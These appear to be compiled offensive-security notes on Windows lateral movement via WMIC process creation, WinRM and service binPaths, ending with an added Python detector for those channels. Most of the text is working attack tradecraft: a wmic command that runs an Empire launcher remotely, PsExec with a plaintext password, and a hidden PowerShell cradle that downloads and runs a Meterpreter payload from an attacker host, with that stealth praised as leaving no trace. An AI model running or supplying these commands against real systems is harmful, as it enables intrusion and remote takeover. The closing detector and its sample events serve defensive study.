Executing commands via WMIC: https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/

WMI Process Create: the heart of the remote-execution modules in Nishang and PowerSploit.

The Win32_Process class can be called via WMI to query, modify, terminate, and create running processes.

As a quick example, here's a command to launch "calc.exe" on a local machine via a WMI statement:

/node: remotely create processes and execute commands on the named host

Create a stager using the Empire launcher:

powershell.exe -NoP -sta -NonI -W Hidden -Enc JABXAEMAPQBOAEUAVwAtAE8AQgBKAGUAQw...truncated...
wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "**empire launcher string here**"

On the victim machine, no window opened, no binary was dropped, no service was created, and unless the machine is configured to log WMI-Activity, no easily traceable log was left behind. Sexy.

This is the same technique that the Kali tools "wmiexec.py", "wmis" and CrackMapExec use.

WinRM

Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP.

The easiest way to detect whether WinRM is available is by seeing if the port is opened. WinRM will listen on one of two ports:

  • 5985/tcp (HTTP)
  • 5986/tcp (HTTPS)

Initiating a WinRM session.

We first have to configure our attack machine to work with WinRM as well. We need to enable it and add any "victims" as trusted hosts. From an elevated PowerShell prompt, run the following two commands:

Enable-PSRemoting -Force  
Set-Item wsman:\localhost\client\trustedhosts *

Once the attack machine is configured, use the Test-WSMan function to test whether the target is configured for WinRM. You should see some information returned about the protocol version and wsmid:

In this case we see that "ordws01" is configured, but "ordws04" is not.

Now we can use PowerShell's Invoke-Command to remotely execute a command on the target over WinRM. To remotely run ipconfig and see the output:

Invoke-Command -Computer ordws01 -ScriptBlock {ipconfig /all} -credential CSCOU\jarrieta

Or, if you want to drop right into an interactive PowerShell session, use the Enter-PSSession function:

Forcing WinRM open. If you really want to use PS Remoting and WinRM but the target isn't configured for it, you could "force" it on through a single command. I wouldn't recommend this, but if you really want to use WinRM or PSRemoting then by all means do it this way. For example, using PsExec:

PS C:\tools\SysinternalsSuite> .\PsExec.exe \\ordws04 -u cscou\jarrieta -p nastyCutt3r -h -d powershell.exe "enable-psremoting -force"

Executing commands via services: https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/

As smbexec demonstrated, it's possible to execute commands directly from service binPaths instead of needing a binary. This can be a useful trick to keep in your back pocket if you need to just execute one arbitrary command on a target Windows machine. As a quick example, let's get a Meterpreter shell using a remote service without a binary.

We'll use Metasploit's web_delivery module and choose a PowerShell target with a reverse Meterpreter payload. The listener is set up and it tells us the command to execute on the target machine:

powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://10.9.122.8:8080/AZPLhG9txdFhS9n');

From our Windows attack box, we create a remote service ("metpsh") and set the binPath to execute cmd.exe with our payload:

And then start it:

It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed:

And we just launched a meterpreter payload remotely through a Windows service without dropping a binary.
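Added defensive counterpart to the three channels on this page (WMI Win32_Process Create, WinRM, and service binPath execution); this is example code, not from the blog or any tool it mentions. Each channel still produces a process-creation record, and the parent process identifies it: WmiPrvSE.exe for WMI, wsmprovhost.exe for WinRM, services.exe for a binPath. The events, hosts and command lines below are constructed sample data in Sysmon-style fields.

```python
import re
from typing import Optional

# Constructed Sysmon-style process-creation events (sample data, not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ordws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": "powershell.exe -NoP -sta -NonI -W Hidden -Enc JABXAEMAPQBO"},
    {"host": "ordws01", "image": r"C:\Windows\System32\ipconfig.exe",
     "parent_image": r"C:\Windows\System32\wsmprovhost.exe", "command_line": "ipconfig /all"},
    {"host": "ordws04", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://example.invalid/x')"},
    {"host": "ordws01", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe"},
]

# Parent process that hosts each remote-execution channel discussed on this page.
REMOTE_PARENTS = {
    "wmiprvse.exe": "WMI Win32_Process.Create",
    "wsmprovhost.exe": "WinRM / PowerShell remoting",
    "services.exe": "service binPath execution",
}
SHELLS = {"cmd.exe", "powershell.exe"}
# Command-line traits of the launchers shown above that justify escalating a finding.
SUSPICIOUS_ARGS = re.compile(r"-enc\s|-w\s+hidden|downloadstring|\biex\b", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> Optional[dict]:
    """Return a finding if the process was spawned by a remote-execution host, else None."""
    parent, image = basename(event["parent_image"]), basename(event["image"])
    channel = REMOTE_PARENTS.get(parent)
    if channel is None:
        return None
    # Ordinary service hosts (svchost.exe etc.) also start under services.exe;
    # only a shell launched straight from a binPath is worth reporting.
    if parent == "services.exe" and image not in SHELLS:
        return None
    suspicious = bool(SUSPICIOUS_ARGS.search(event["command_line"]))
    return {"host": event["host"], "channel": channel, "image": image,
            "severity": "high" if suspicious else "medium"}

def scan(events: list) -> list:
    """Run classify() over a batch of events and keep only the findings."""
    return [f for f in map(classify, events) if f is not None]
```

On a real estate the same logic runs over Sysmon Event ID 1 or Security 4688 (with command-line auditing enabled); without parent/command-line fields the WMI channel in particular is nearly invisible, which is exactly the gap the WMI section above describes.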
